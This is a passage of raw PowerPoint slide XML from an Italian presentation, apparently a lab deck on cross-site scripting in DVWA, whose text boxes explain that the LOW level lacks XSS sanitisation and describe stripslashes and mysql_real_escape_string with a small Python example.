                  <a:pt x="9182684" y="5222926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5222926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="-26213" t="-22386" r="-8814" b="-39709"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9857391" y="7190458"/>
            <a:ext cx="2683980" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="38100">
            <a:solidFill>
              <a:srgbClr val="DC0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 24" id="24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9857391" y="6686239"/>
            <a:ext cx="2683980" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="38100">
            <a:solidFill>
              <a:srgbClr val="DC0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 25" id="25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9527966" y="6351768"/>
            <a:ext cx="2683980" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="38100">
            <a:solidFill>
              <a:srgbClr val="DC0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 26" id="26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="true" rot="0">
            <a:off x="6095104" y="1821301"/>
            <a:ext cx="3762286" cy="1899955"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1899955" w="3762286">
                <a:moveTo>
                  <a:pt x="0" y="1899954"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3762287" y="1899954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3762287" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1899954"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 27" id="27"/>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8" id="28"/>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9" id="29"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1748967" y="1783201"/>
            <a:ext cx="4846143" cy="7792578"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3087"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2205">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>La DVWA al livello LOW è vulnerabile a questo tipo di attacco perché c’è un problema di sanitizzazione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2205">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>degli input. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3087"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3087"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2205">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Cliccando su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2205">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>View Source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2205">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> notiamo che gli input del campo “message”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3087"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2205">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>sono sanitizzati con le funzioni </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2205">
                <a:solidFill>
                  <a:srgbClr val="DC0000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>stripslashes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2205">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2205">
                <a:solidFill>
                  <a:srgbClr val="DC0000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> mysql_real_escape_string, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2205">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>mentre l‘input del campo nome solo dalla seconda. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3087"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2205">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Queste funzioni</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3087"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2205">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>fanno in modo che non vengano accettati input in linguaggio SQL,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3087"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2205">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>quindi ci vietano di fare attacchi SQL Injection. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3087"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2205">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Manca però la</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3087"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2205">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>sanitizzazione per gli XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3087"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="d"/>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5179314" y="-2588087"/>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3510909" y="-2433493"/>
            <a:ext cx="4881397" cy="4673937"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4673937" w="4881397">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4881397" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4881397"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100000">
            <a:off x="-1464975" y="5372885"/>
            <a:ext cx="4881397" cy="4673937"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4673937" w="4881397">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4881397" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4881397" y="4673937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4673937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>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TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1193911"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3.1 - PANORAMICA XSS</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6427207" y="3570313"/>
            <a:ext cx="8301228" cy="1312914"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1312914" w="8301228">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8301228" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8301228" y="1312914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1312914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 11" id="11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1028700" y="5654040"/>
            <a:ext cx="6765877" cy="1185652"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1185652" w="6765877">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6765877" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6765877" y="1185652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1185652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="-10993" b="-12278"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 12" id="12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="1028700" y="7369536"/>
            <a:ext cx="5320563" cy="2056960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2056960" w="5320563">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5320563" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5320563" y="2056960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2056960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 13" id="13"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="6836486" y="1418282"/>
            <a:ext cx="4433590"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1"/>
              </a:rPr>
              <a:t>Stripslashes in Python</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 14" id="14"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="937981" y="1542016"/>
            <a:ext cx="16230600" cy="2162810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3919"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2799">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Cos’è la Stripslash ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>La funzione stripslashes rimuove le backslash da una stringa se si trovano prima di apici singoli, apici doppi e backslash. “Replace” è un metodo che consente di sostituire una parte di stringa vecchia con una nuova: stringa.replace(“vecchia”, “nuova”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 15" id="15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="8100000">
            <a:off x="14452657" y="-3070730"/>
            <a:ext cx="4881397" cy="4673937"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4673937" w="4881397">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4881397" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4881397" y="4673937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4673937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 16" id="16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="4567575" y="1523057"/>
            <a:ext cx="573839" cy="672139"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="672139" w="573839">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="573838" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573838" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="672139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 17" id="17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10691647">
            <a:off x="7392209" y="6144644"/>
            <a:ext cx="1743475" cy="514325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="514325" w="1743475">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1743475" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1743475" y="514325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="514325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>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0" id="20"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="5105400"/>
            <a:ext cx="16230600" cy="396240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Esempio:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 21" id="21"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9329928" y="5720715"/>
            <a:ext cx="8436949" cy="1653540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Inserendo la stringa “\’Team6", questa viene passata come parametro alla funzione stripslashes che effettua una sanitizzazione, viene salvata nella variabile clean_string e poi data in stampa.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8344094" y="8023860"/>
            <a:ext cx="5320563" cy="1234440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>In output possiamo vedere come il carattere \ è stato rimosso dalla stringa.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="-10800000">
            <a:off x="6183149" y="8145805"/>
            <a:ext cx="1743475" cy="514325"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="514325" w="1743475">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1743475" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1743475" y="514325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="514325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover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100000">
            <a:off x="-1241873" y="6597285"/>
            <a:ext cx="4881397" cy="4673937"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4673937" w="4881397">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4881397" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4881397" y="4673937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4673937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 6" id="6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-1975556" y="1267336"/>
            <a:ext cx="10747001" cy="9967843"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="9967843" w="10747001">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10747001" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10747001" y="9967843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9967843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 7" id="7"/>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TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1681541" y="458143"/>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3.1 - PANORAMICA XSS</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9709226" y="2350499"/>
            <a:ext cx="7761452" cy="6775366"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6775366" w="7761452">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7761451" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7761451" y="6775366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6775366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 11" id="1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2" id="1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13" id="13"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="499365" y="2283824"/>
            <a:ext cx="78072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1 Bold"/>
              </a:rPr>
              <a:t> mysql_real_escape_string in Python </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 14" id="14"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="789967" y="4063132"/>
            <a:ext cx="8388597" cy="3749040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
